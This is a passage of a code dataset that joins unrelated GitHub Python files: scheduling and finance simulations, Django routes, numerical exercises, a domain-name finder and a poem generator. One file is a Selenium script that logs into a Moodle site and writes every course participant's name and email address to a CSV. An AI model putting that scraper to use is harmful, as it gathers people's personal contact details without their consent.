copy of the GNU General Public License\n along with this program. If not, see .\n'''\n\nimport sqlite3\nimport random\nimport numpy\nimport csv\n\nclass room_class:\n\n def __init__(self, available, suitable):\n self.available = frozenset(available)\n self.suitable = frozenset(suitable)\n\n def __eq__(self, other):\n return self.available == other.available and self.suitable == other.suitable\n\n def __ne__(self, other):\n return self.available != other.available or self.suitable != other.suitable\n\n def __hash__(self):\n return hash(self.suitable) ^ hash(self.available)\n\n def __repr__(self):\n return \"available: %s, suitable %s\" % (str(self.available), str(self.suitable))\n\n\ndef setup_db(db_path, num_talks, num_hours, num_attendees, num_rsvps, distribution, sigma_ratio):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM talks WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM gives_talk WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM talk_available WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM room_suitable_for WHERE tid >= ?', (num_talks,))\n c.execute('DELETE FROM hours WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM presenter_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM room_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM talk_available WHERE hid >= ?', (num_hours,))\n c.execute('DELETE FROM schedule')\n if num_attendees != None:\n c.execute('DELETE FROM attendee')\n c.execute('DELETE FROM attendee_interest')\n conn.commit()\n max_tid = c.execute('SELECT MAX(tid) FROM talks').fetchone()[0]\n tid_range = range(0, max_tid + 1)\n aid = 0\n\n if distribution.startswith('2013'):\n tdist = 0 if 'normal' in distribution else 1\n\n if 'class' in distribution:\n room_classes = {}\n rooms = {}\n for room_row in c.execute('SELECT rid, name FROM rooms').fetchall():\n rid = int(room_row[0])\n room_name = room_row[1]\n if room_name == 'Food':\n room_name = 'Food'\n rooms[rid] = room_name\n\n room_available = set()\n room_suitable = set()\n for available_row in c.execute('SELECT hid FROM room_available WHERE rid = ?', (rid,)).fetchall():\n room_available.add(int(available_row[0]))\n for suitable_row in c.execute('SELECT tid FROM room_suitable_for WHERE rid = ?', (rid,)).fetchall():\n room_suitable.add(int(suitable_row[0]))\n\n rclass = room_class(room_available, room_suitable)\n if not rclass in room_classes:\n room_classes[rclass] = set()\n room_classes[rclass].add(rid)\n\n c.execute('DELETE FROM rooms')\n c.execute('DELETE FROM room_available')\n c.execute('DELETE FROM room_suitable_for')\n c.execute('DELETE FROM room_class_member')\n c.execute('DELETE FROM room_class_members')\n conn.commit()\n\n rclass_id = 0\n member_defined = set()\n for rclass, rooms_in_class in room_classes.iteritems():\n c.execute('INSERT INTO rooms values (?, ?, ?)', (rclass_id, 'Room class %d' % rclass_id, len(rooms_in_class)))\n for room_in_class in rooms_in_class:\n if not room_in_class in member_defined:\n c.execute('INSERT INTO room_class_member VALUES (?, ?)', (room_in_class, rooms[room_in_class]))\n member_defined.add(room_in_class)\n c.execute('INSERT INTO room_class_members VALUES (?, ?)', (rclass_id, room_in_class))\n for hid in rclass.available:\n c.execute('INSERT INTO room_available VALUES (?, ?)', (rclass_id, hid))\n for tid in rclass.suitable:\n c.execute('INSERT INTO room_suitable_for VALUES (?, ?)', (rclass_id, tid))\n rclass_id += 1\n conn.commit()\n\n with open('2013_real_attendance.csv') as csvfile:\n reader = csv.reader(csvfile)\n attendee_rsvps = {}\n tids_already_processed = {}\n while aid < num_attendees:\n c.execute('INSERT INTO attendee VALUES (?)', (aid,))\n attendee_rsvps[aid] = set()\n aid += 1\n aid_range = range(0, num_attendees)\n for row in reader:\n talk_name = row[0]\n row_tids = c.execute('SELECT tid FROM talks WHERE name = ?', (talk_name,)).fetchall()\n if len(row_tids) == 0:\n #print 'Unable to find tid for %s' % talk_name\n continue\n tid = int(row_tids[0][0])\n if tid > max_tid:\n continue\n if not tid in tids_already_processed:\n tids_already_processed[tid] = 0\n real_attendance = int(row[3])\n if real_attendance >= num_attendees:\n real_attendance = num_attendees\n for i in range(tids_already_processed[tid], real_attendance):\n max_aid = len(aid_range) - 1\n if tdist == 1:\n aid = random.choice(aid_range)\n else:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while aid < 0 or aid > max_aid:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while (tid in attendee_rsvps[aid]) or (len(attendee_rsvps[aid]) >= num_hours):\n if tdist == 1:\n aid = random.choice(aid_range)\n else:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n while aid < 0 or aid > max_aid:\n aid = int(sigma_ratio * max_aid * numpy.random.randn()) + int(max_aid / 2)\n attendee_rsvps[aid].add(tid)\n c.execute('INSERT INTO attendee_interest VALUES (?, ?)', (aid, tid))\n tids_already_processed[tid] = real_attendance\n\n else:\n while aid < num_attendees:\n c.execute('INSERT INTO attendee VALUES (?)', (aid,))\n rsvps = set()\n i = 0\n while i < num_rsvps:\n if distribution == 'uniform':\n tid = random.choice(tid_range)\n else:\n tid = int(sigma_ratio * max_tid * numpy.random.randn()) + int((max_tid/2))\n while tid < 0 or tid > max_tid:\n tid = int(sigma_ratio * max_tid * numpy.random.randn()) + int((max_tid/2))\n if tid in rsvps:\n continue\n else:\n rsvps.add(tid)\n i += 1\n c.execute('INSERT INTO attendee_interest VALUES (?, ?)', (aid, tid))\n aid += 1\n\n conn.commit()\n conn.close()\n","repo_name":"jquesnelle/convention-scheduling","sub_path":"code/setupdb.py","file_name":"setupdb.py","file_ext":"py","file_size_in_byte":8223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18058074242","text":"from qe_financial_spillover.src.fund import Fund\nfrom qe_financial_spillover.src.asset import Asset\nfrom qe_financial_spillover.src.functions import *\nfrom qe_financial_spillover.src.functions.distribute import *\nfrom qe_financial_spillover.src.functions.stochasticprocess import ornstein_uhlenbeck_levels\nimport random\nimport numpy as np\n\n\ndef init_funds(identifiers_funds, lambdas, thetas, phis, phis_p, phis_x, regions, std_noises, asset_dict):\n #Instantiate investor funds using the number of identifiers as range\n fund_list = []\n # Loop over number of funds\n for ident, lambda_ , theta, phi , phi_p , phi_x, std_noise in zip(identifiers_funds, lambdas, thetas, phis, phis_p, phis_x, std_noises):\n # Instantiate fund object\n fund = Fund(ident, lambda_, theta, phi, phi_p, phi_x, std_noise)\n # Save in list\n fund_list.append(fund)\n\n fund_regions = distribute_funds_equally(len(identifiers_funds), regions)\n # Attach region to funds\n count_domestic = 0\n count_foreign = 0\n for fund, region_label in zip(fund_list, fund_regions):\n fund.parameters['region'] = region_label\n if \"domestic\" in fund.parameters['region']:\n count_domestic+=1\n if \"foreign\" in fund.parameters['region']:\n count_foreign += 1\n\n # Give balance sheets items to funds\n for index, i in asset_dict.iteritems():\n # exclude cash, because only funds in the region hold cash\n if \"cash\" not in i.identifier:\n asset_quantity = distribute_funds_equally(len(identifiers_funds), [i.parameters['global_supply']/len(identifiers_funds)])\n\n for fund, quantity in zip(fund_list, asset_quantity):\n # We save a the object and quantity inside a dictionary attached to the fund\n fund.assets[i] = quantity\n if \"cash\" in i.identifier:\n # #check in which region we are\n for fund in fund_list:\n # print fund.parameters['region'], fund.identifier, i.identifier\n if \"domestic\" in fund.parameters['region'] and \"domestic\" in i.identifier:\n fund.assets[i] = i.parameters['global_supply']/count_domestic\n if \"foreign\" in fund.parameters['region'] and \"foreign\" in i.identifier:\n fund.assets[i] = i.parameters['global_supply'] / count_foreign\n fund_size = 0\n # # Allocate fund size\n for fund in fund_list: # TODO Liabilities is the sum of asset_quantity * price over all assets; price of bonds is initialised with 1 and cash doesn't have a price\n for key, value in fund.assets.iteritems():\n\n fund_size += value\n fund.liabilities = fund_size\n\n return fund_list\n\ndef get_fund_size(funds):\n global_capital = 0\n for fund in funds:\n global_capital+= fund.liabilities\n return global_capital\n\ndef init_assets(regions, identifiers_assets, ms, rhos, omegas, face_values, global_supply, prices):\n # Instantiate investor funds using the number of identifiers as range\n asset_dict = {}\n for ident, m, rho, omega, face_value, global_supply, price in zip(identifiers_assets, ms, rhos, omegas, face_values,global_supply, prices):\n # Instantiate fund object\n asset = Asset(ident, m, rho, omega, face_value, global_supply, price)\n # Save in dict - hard coded; not elegant and problematic if there are more regions\n asset_dict[ident] = asset\n\n if \"domestic\" in asset.identifier:\n asset.parameters['region'] = \"domestic\"\n if \"foreign\" in asset.identifier:\n asset.parameters['region'] = \"foreign\"\n\n\n\n return asset_dict\n\ndef init_price_history(assets, backward_simulated_time): #Todo: take the same price histry for all assets? If not simulate inside loop\n \"\"\"generate price history using mean reversion process and add to assets\"\"\"\n price_history = ornstein_uhlenbeck_levels(time=backward_simulated_time, init_level=1,\n long_run_average_level=1, sigma=0.025)\n price_history.reverse()\n for key, asset in assets.iteritems():\n if not 'cash' in key:\n asset.prices_history = price_history\n\n\ndef init_exp_default_probabilities(assets, funds):\n for fund in funds:\n for key, value in assets.iteritems():\n fund.exp_default_probability[key] = value.parameters['omega']\n # cash has 0 as attribute\n if \"cash\" in key:\n fund.exp_default_probability[key] = 0\n\n #Also add keys, value pairs for realised returns and intermediate realised returns\n fund.realised_returns_intermediate[key] = 0\n fund.realised_returns[key] = 0\n\n\ndef init_ewma_price(assets, funds, exchange_rate):\n for fund in funds:\n for key, value in assets.iteritems():\n fund.ewma_price[key] = value.prices[-1]\n fund.ewma_price_intermediate[key] = 0\n\n # cash has 0 as attribute\n if \"cash\" in key:\n fund.ewma_price[key] = 0\n fund.ewma_price[key] = 0\n\n #Initialise ewma with the first exchange rate past into main simulation file\n fund.ewma_x['x_domestic_to_foreign'] = exchange_rate['x_domestic_to_foreign'][-1]\n fund.ewma_x_intermediate['x_domestic_to_foreign'] = 0\n\ndef init_news_process(asset_dict, days):\n for key, asset in asset_dict.iteritems():\n if \"cash\" not in key:\n asset.news_process = ornstein_uhlenbeck_levels(days)","repo_name":"wxyrc5/WhiteRhino","sub_path":"examples/qe_financial_spillover/src/initialisation.py","file_name":"initialisation.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"71290526322","text":"import os\nimport csv\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\n# ENTER Credentials\nuserName = \"USERNAME\"\nmypass = \"PASSWORD\"\ncourseID = \"Enter Your Course ID from URL\"\n\n# Enable headless browser\noptions = Options()\noptions.headless = True\n\n# disable image loading\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference('permissions.default.image', 2)\nfirefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n\ndriver = webdriver.Firefox(options=options,firefox_profile=firefox_profile)\n\n# LOGIN TO MOODLE\ndriver.get(\"http://tmoodle.fccollege.edu.pk/moodle/login/index.php\")\ndriver.find_element_by_xpath('//*[@id=\"username\"]').send_keys(userName)\ndriver.find_element_by_xpath('//*[@id=\"password\"]').send_keys(mypass)\ndriver.find_element_by_xpath('//*[@id=\"loginbtn\"]').click()\n\n# Goto course participants page with show all enabled\ndriver.get(\"http://tmoodle.fccollege.edu.pk/moodle/user/index.php?id=\"+courseID+\n \"&perpage=100\")\n\ndata = []\n\npeeps_elem = driver.find_elements_by_xpath(\"/html/body/div[1]/div[2]/div/div/section/div/div/div/div[2]/div[3]/table/tbody/tr/td/a\")\nfor each in peeps_elem:\n url = each.get_attribute(\"href\")\n driver.execute_script('window.open(\"{}\", \"_blank\");')\n driver.switch_to.window(driver.window_handles[1])\n driver.get(url)\n\n try:\n name = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div[1]/div[2]/h2').text\n\n email = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div/section[1]/ul/li/dl/dd/a').text\n\n except Exception as e:\n email = \"N/A\"\n print(e)\n\n print(name, email)\n\n text = [name,email]\n\n # Save data to csv\n data.append(text)\n\n with open('students.csv', 'w') as data_file:\n writer = csv.writer(data_file)\n writer.writerows(data)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n","repo_name":"imasimali/moodle-scrape","sub_path":"moodle-scraper.py","file_name":"moodle-scraper.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"17852466634","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('',views.inicio , name =\"Inicio\"), \n\n path('alta_usuarios', views.alta_usuarios, name=\"AgregarUsuario\"),\n path('alta_articulos',views.alta_articulos, name=\"AgregarArticulo\"),\n path('alta_vendedores',views.alta_vendedores, name=\"AgregarVendedor\"),\n# mensajes usuario\n path('comentar', views.comentar, name=\"EnviarMensaje\" ),\n path('comentar/', views.comentar, name=\"EnviarMensaje\" ),\n \n path('mensajes', views.mensajes, name=\"Mensajes\" ),\n path('mensajes/', views.mensajes, name=\"Mensajes\" ),\n#mensajes vendedor\n\n path('comentarVendedor', views.comentar_vendedor, name=\"EnviarMensajeVendedor\" ),\n path('comentarVendedor/', views.comentar_vendedor, name=\"EnviarMensajeVendedor\" ),\n \n path('mensajesVendedor', views.mensajes_vendedor, name=\"MensajesVendedor\" ),\n path('mensajesVendedor/', views.mensajes_vendedor, name=\"MensajesVendedor\" ),\n\n#mensajes articulos\n\n path('comentarArticulo', views.comentar_articulos, name=\"EnviarMensajeArticulo\" ),\n path('comentarArticulo/', views.comentar_articulos, name=\"EnviarMensajeArticulo\" ),\n \n path('mensajesArticulo', views.mensajes_articulos, name=\"MensajesArticulo\" ),\n path('mensajesArticulo/', views.mensajes_articulos, name=\"MensajesArticulo\" ),\n\n\n\n path('usuarios', views.usuarios, name=\"usuarios\"),\n path('articulos', views.articulos, name=\"articulos\"), \n path('vendedores', views.vendedores, name=\"vendedores\"),\n path('about', views.about , name=\"about\" ), \n\n path('buscar',views.buscar, name=\"buscar\"),\n path('busqueda',views.busqueda, name = \"busqueda\"),\n path('buscar_articulo',views.buscar_articulo , name = \"buscar_articulo\" ),\n path('busqueda_articulo',views.busqueda_articulo, name = \"busqueda_articulo\"), \n path('buscar_vendedor',views.buscar_vendedor, name = \"buscar_vendedor\"),\n path('busqueda_vendedor',views.busqueda_vendedor, name = \"busqueda_vendedor\"),\n\n path('eliminar_articulo/', views.eliminar_articulo, name=\"EliminarArticulo\"),\n path('eliminar_vendedor/', views.eliminar_vendedor, name=\"EliminarVendedor\"),\n path('eliminar_usuario/', views.eliminar_usuario, name=\"EliminarUsuario\"),\n\n path('editar_articulo/', views.editar_articulo, name=\"EditarArticulo\"),\n path('editar_articulo/', views.editar_articulo, name=\"EditarArticulo\"),\n path('editar_vendedor/', views.editar_vendedor, name=\"EditarVendedor\"),\n path('editar_vendedor/', views.editar_vendedor, name=\"EditarVendedor\"),\n path('editar_usuario/', views.editar_usuario, name=\"EditarUsuario\"),\n path('editar_usuario/', views.editar_usuario, name=\"EditarUsuario\"),\n path('login/' , include(\"login.urls\")),\n path('perfil/', views.perfil, name=\"Perfil\"),\n path('cargar_avatar/', views.cargar_avatar, name=\"Cargar_avatar\"),\n]","repo_name":"AquinoGaston/Entrega1AquinoGaston","sub_path":"app_fam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23759362307","text":"import sphinx.roles as mod\nfrom docutils.nodes import Text\nfrom docutils.parsers.rst import roles\n\n\ndef new_literal_role(typ, rawtext, text, lineno, inliner, options=None,\n content=None, old_role=None):\n \"\"\"Extends the literal role handler to allow replace substitutions.\"\"\"\n\n node, _ = old_role(typ, rawtext, text, lineno, inliner, options,\n content)\n doc = inliner.document\n\n replacements = [(i.attributes['names'][0], i.children[0])\n for i in doc.substitution_defs.values()]\n\n # some items due for replacement are stored as config values\n replacements.append(('version', Text(doc.settings.env.config.version)))\n\n for rep in replacements:\n node[0][0] = Text(node[0][0].replace('|' + rep[0] + '|', rep[1]))\n\n return node, _\n\n\ndef setup(app):\n \"\"\"Overrides literal role handlers.\"\"\"\n\n # Inject the old_role keyword argument to ensure a seamless override.\n def spliced_role(*arg, **kwarg):\n return new_literal_role(*arg, old_role=mod.emph_literal_role, **kwarg)\n\n # Select all literal role names.\n names = [key for key, value in mod.specific_docroles.items()\n if value is mod.emph_literal_role]\n\n # Override all literal roles with the extended handler.\n for name in names:\n roles.register_local_role(name, spliced_role)\n","repo_name":"Mustafa201611/unit-docs","sub_path":"source/exts/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"12517023940","text":"h=10\nr=5\nf=15\nVtank=3.14*(r)**2*h\nt=int(input('Enter time='))\nVwater=f*t\nif Vwater>Vtank:\n\tprint('Overflow')\n\tprint('Volume',Vwater-Vtank)\nelif Vwater==Vtank:\n\tprint('Fill')\nelse:\n\tprint('Underflow')\n\tht=Vwater/(3.14*(r)**2)\n\thr=h-ht\n\tprint('Filled height=',round(ht,2),'Remaining height=',round(hr,2))\n","repo_name":"Ritika-Brewal/Python-lab","sub_path":"pro7.py","file_name":"pro7.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10441613620","text":"# Mean Means\r\n# https://www.codewars.com/kata/57c6b44f58da9ea6c20003da/train/python\r\n\r\n# 나의 풀이\r\nfrom functools import reduce\r\ndef geo_mean(nums, arith_mean):\r\n l = len(nums)+1\r\n nums.append(arith_mean*l-sum(nums))\r\n return reduce(lambda x, y: x*y, nums)**(1/l)\r\n\r\n# 다른 사람의 풀이\r\nfrom operator import mul\r\ndef geo_mean1(nums, mean):\r\n nums.append(mean*(len(nums)+1)-sum(nums))\r\n return reduce(mul, nums) ** (1/len(nums))\r\n\r\nfrom math import prod\r\ndef geo_mean2(nums, arith_mean):\r\n nums.append(arith_mean * (len(nums)+1) - sum(nums))\r\n return prod(nums)**(1/len(nums))\r\n\r\nprint(geo_mean([2], 10), 6)\r\nprint(geo_mean([1, 2], 3), 2.2894284851066637)\r\nprint(geo_mean([4, 6, 7, 2], 5), 4.580344097847165)","repo_name":"whyj107/CodeWar","sub_path":"20221228_Mean Means.py","file_name":"20221228_Mean Means.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41143877510","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n re = sys.modules[\"re\"]\n patternA = re.compile(r\" *[+-]?\\d+.*\")\n patternB = re.compile(r\"[+-]?\\d+\")\n \n if(patternA.match(str) == None):\n return 0\n else:\n strA = patternB.findall(str)[0]\n if(strA[0] == \"+\"):\n x = int(strA[1:])\n elif(strA[0] == \"-\"):\n x = -1 * int(strA[1:])\n else:\n x = int(strA)\n \n if(x >= pow(2, 31)):\n return pow(2, 31) - 1\n elif(x <= -1*pow(2, 31)):\n return -1*pow(2, 31)\n else:\n return x","repo_name":"lifeng1992/LeetcodeByLifeng1992","sub_path":"Python/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21106737169","text":"import numpy as np\n\ntolerance = 0.00000001\niterations_limit = 7\n\ndef broyden(x0_vector, initial_approx_Jacobian, f_vector):\n\n x_vector = x0_vector\n approx_Jacobian = initial_approx_Jacobian\n for iteration in range(iterations_limit):\n\n jacobian_current_values = approx_Jacobian\n function_current_values = f_vector(x_vector)\n \n delta_x = -1*(np.matmul(np.linalg.inv(jacobian_current_values),\n function_current_values))\n\n x_vector = x_vector + delta_x\n delta_f = f_vector(x_vector) - function_current_values\n\n if(np.linalg.norm(delta_x)/np.linalg.norm(x_vector) \\\n < tolerance):\n return x_vector\n else:\n jacob_correction = ((delta_f - approx_Jacobian \n @ delta_x) @ np.transpose(delta_x))\\\n /(np.transpose(delta_x) @ delta_x)\n approx_Jacobian = approx_Jacobian + jacob_correction\n\n return \"Convergence not reached: \\n\" + str(x_vector)\n\ndef f_vector(x_vector):\n return np.array([[x_vector[0][0] + 2*x_vector[1][0] - 2.0], \n [pow(x_vector[0][0], 2) + 4*pow(x_vector[1][0], 2) - 4]])\n\nprint(broyden(np.array([[2], [3]]), np.array([[1, 2], [4, 24]]), f_vector))\n","repo_name":"JonathanAlcantara/NumericalLinearAlgebra_Applications","sub_path":"RootFinding/broyden.py","file_name":"broyden.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13429154525","text":"from dependency_injector import containers, providers\n\nfrom src.domain.users.repositories.user_repository import UserRepository\nfrom src.domain.users.services import (\n CreateUserService,\n ListUserService,\n DetailUserService\n)\n\n\nclass UserContainer(containers.DeclarativeContainer):\n\n db = providers.Dependency()\n\n user_repository = providers.Factory(\n UserRepository,\n session_factory=db.provided.session,\n )\n\n create_user_service = providers.Factory(\n CreateUserService,\n repository=user_repository\n )\n\n list_user_service = providers.Factory(\n ListUserService,\n repository=user_repository\n )\n\n detail_user_service = providers.Factory(\n DetailUserService,\n repository=user_repository\n )\n","repo_name":"Genial-Ideias/boilerplate-fastapi","sub_path":"src/infra/containers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"19271479444","text":"import pickle\nimport random\nimport whois\nimport urllib2\nimport re\nfrom bs4 import BeautifulSoup\n\n__author__ = 'kongaloosh'\n\ndef random_domain():\n pass\n\n\ndef domainify():\n \"\"\"Returns a random domain where the last characters form a TLD\"\"\"\n results = open('results','r')\n domains = []\n try:\n while True:\n domains.append(pickle.load(results))\n\n except EOFError:\n while True:\n pick = domains[random.randint(0, (len(domains))-1)]\n print(pick[0])\n definition = find(pick[0][0])\n if definition:\n results = []\n for (word,tld) in pick:\n try:\n domain = word[:len(word)-len(tld)] + '.' + tld\n if whois.whois(domain)[\"expiration_date\"]:\n results.append({'domain':domain, 'definition':definition})\n except (UnboundLocalError, KeyError):\n pass\n except whois.parser.PywhoisError: # this isn't 100% accurate\n results.append({'domain':domain, 'definition':definition})\n if len(results)>0:\n return results[random.randint(0, (len(results))-1)]\ndef find(word):\n print(word)\n try:\n x=urllib2.urlopen(\"http://dictionary.reference.com/browse/\"+word+\"?s=t\")\n except:\n return None\n\n x=x.read()\n soup = BeautifulSoup(x, 'html.parser')\n defs = soup.find_all('div', class_=\"def-content\")\n defs = [d.text for d in defs]\n if defs: return defs\n\n items=re.findall('','')\n m=re.findall('at Dictionary.com, a free online dictionary with pronunciation, synonyms and translation. Look it up now! \"/>',z)\n if m==[]:\n if z.startswith(\"Get your reference question answered by Ask.com\"):\n return None\n else:\n return z\n else:\n return None\n\nif __name__ == \"__main__\":\n find('dream')","repo_name":"Kongaloosh/word_search","sub_path":"domain_getter.py","file_name":"domain_getter.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6817113006","text":"temp = []\nlista = []\nmaior = menor = 0\nwhile True:\n temp.append(str(input('Nome : ')).strip())\n temp.append( float(input('Peso : ')))\n if len(lista) == 0:\n maior = menor = temp[1]\n else:\n if temp[1] > maior:\n maior = temp[1]\n if temp[1] < menor:\n menor = temp[1]\n lista.append(temp[:])\n temp.clear()\n continuar = ' '\n while continuar not in 'SN':\n continuar = str(input('Deseja continuar [S/N] ? ')).strip().upper()\n if continuar == 'N':\n break\nprint(f'-='*20)\nprint(f'Foram cadastradas {len(lista)} pesssoas')\nprint(f'Os maiores peso foi de {maior}KG.Peso de :',end=' ')\nfor p in lista:\n if p[1] == maior:\n print(f'[{p[0]}]',end=',')\nprint()\nprint(f'Os menores peso foi de {menor}KG.Peso de :',end=' ')\nfor p in lista:\n if p[1] == menor:\n print(f'[{p[0]}]',end=',')","repo_name":"paulovictor1997/Python","sub_path":"Listas/desafio84.py","file_name":"desafio84.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21479880593","text":"#!/usr/bin/env python3\nimport sys \n\nif len(sys.argv) < 3:\n raise ValueError(\"Usage: ./main.py result.log ldm\")\n\nfp = open(sys.argv[1], \"r\")\nldm = int(sys.argv[2])\n\ntime_li = []\nfor line in fp:\n if \"MPI time (ms)\" in line:\n time = line.strip(\"MPI time (ms)\").strip('\\n')\n print(time)\n time_li.append(float(time))\n if \"Time (ms)\" in line:\n time = line.strip(\"Time (ms):\").strip('\\n')\n print(time)\n time_li.append(float(time))\nfp.close()\n\nfout = open(sys.argv[1].strip(\".log\")+\".csv\", 'w')\n# fout.write(\"Dataset,Time (ms)\\n\")\n# print(time_li)\n\ncnt = 0\nfor time_val in time_li:\n if (cnt + 1) % ldm == 0:\n fout.write(\"{}\\n\".format(time_val))\n else:\n fout.write(\"{},\".format(time_val))\n cnt += 1\nfout.close()","repo_name":"YukeWang96/MGG_OSDI23","sub_path":"analysis_profile.py","file_name":"analysis_profile.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"28467074818","text":"from packaging import version\nimport sklearn\n\nassert version.parse(sklearn.__version__) >= version.parse(\"1.0.2\")\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsRegressor\n\n#DataLoad\n\n#download data:\nimport urllib.request\ndata_root = \"https://github.com/ageron/data/raw/main/\"\nlifesat = pd.read_csv(data_root + \"lifesat/lifesat.csv\")\nX = lifesat[[\"GDP per capita (USD)\"]].values\ny = lifesat[[\"Life satisfaction\"]].values\n\n#\nlifesat.loc[lifesat['Country']==\"Turkey\"]\n#plot\n\nlifesat.plot(kind=\"scatter\",x='GDP per capita (USD)'\n ,y='Life satisfaction'\n )\nplt.show()\n\n#plot with \n\nlifesat.plot(kind=\"scatter\",x='GDP per capita (USD)'\n ,y='Life satisfaction'\n )\nplt.axis([23_500,62_500,4,9])\nplt.show()\n\n\n\nmodel2=KNeighborsRegressor()\nmodel2.fit(X,y)\n\ny_pred=model2.predict(X)\n\n#test our model\nX_new=[[27287.08]]\nprint(model2.kneighbors(X_new))\n\n#validation\nfrom sklearn.metrics import mean_squared_error\n\n\nmean_squared_error(y,Y_pred)\n\n","repo_name":"hanyeh00/machine-learning","sub_path":"classificationExample/KNN_sklearn.py","file_name":"KNN_sklearn.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"38121643606","text":"from typing import List\r\n\r\nclass Solution:\r\n def findKthLargest(self, nums: List[int], k: int) -> int:\r\n \r\n self.arrSize = len(nums)\r\n \r\n\r\n self.heapSort(nums, self.arrSize)\r\n \r\n if k == 1:\r\n return nums[-1]\r\n\r\n if len(nums) < k:\r\n return nums[-1]\r\n\r\n return nums[(-k)]\r\n\r\n\r\n\r\n def parentOfElement(self, i: int) -> int:\r\n return (i/2)\r\n\r\n def leftOfElement(self, i: int) -> int:\r\n return (2*i+1)\r\n\r\n def rightOfElement(self, i: int) -> int:\r\n return (2*i+2)\r\n\r\n def maxHeapify(self, nums: List[int], key: int):\r\n left = self.leftOfElement(key)\r\n right = self.rightOfElement(key)\r\n length = self.arrSize\r\n\r\n if left < length and nums[left] > nums[key]:\r\n largest = left\r\n\r\n else:\r\n largest = key\r\n\r\n if right < length and nums[right] > nums[largest]:\r\n largest = right\r\n\r\n if largest != key:\r\n temp = nums[key]\r\n nums[key] = nums[largest]\r\n nums[largest] = temp\r\n self.maxHeapify(nums, largest)\r\n\r\n def buildMaxHeap(self, nums: List[int], size: int):\r\n self.arrSize = size\r\n for index in reversed(range(0,(size//2))):\r\n self.maxHeapify(nums, index)\r\n \r\n def heapSort(self, nums: List[int], size: int):\r\n self.buildMaxHeap(nums, size)\r\n \r\n for i in reversed(range(1, size)):\r\n temp = nums[0]\r\n nums[0] = nums[i]\r\n nums[i] = temp\r\n self.arrSize = self.arrSize - 1\r\n self.maxHeapify(nums, 0)\r\n\r\narray = [7,6,5,4,3,2,1]\r\ntest = Solution()\r\nresult = test.findKthLargest(nums=array, k=2)\r\nprint(result)\r\n\r\n\r\n","repo_name":"TheZenithTree/ATU-COMS3213","sub_path":"kthElement.py","file_name":"kthElement.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28709048469","text":"from random import choice\r\n\r\nnouns = [\"fossil\",\t\"horse\",\t\"aardvark\",\t\"judge\",\t\"chef\",\t\"mango\",\t\"extrovert\", \"gorilla\"]\r\nverbs = [\"kicks\",\t\"jingles\",\t\"bounces\",\t\"slurps\",\t\"meows\",\t\"explodes\",\t\"curdles\"]\r\nadjectives = [\"furry\",\t\"balding\",\t\"incredulous\",\t\"fragrant\",\t\"exuberant\",\t\"glistening\"]\r\nprepositions = [\"against\",\t\"after\",\t\"into\",\t\"beneath\",\t\"upon\",\t\"for\",\t\"in\",\t\"like\",\t\"over\", \"within\"]\r\nadverbs = [\"curiously\", \"extravagantly\",\t\"tantalizingly\",\t\"furiously\",\t\"sensuously\"]\r\n\r\n\r\ndef makepoem():\r\n\r\n # pull up 3 nouns\r\n n1 = choice(nouns)\r\n n2 = choice(nouns)\r\n n3 = 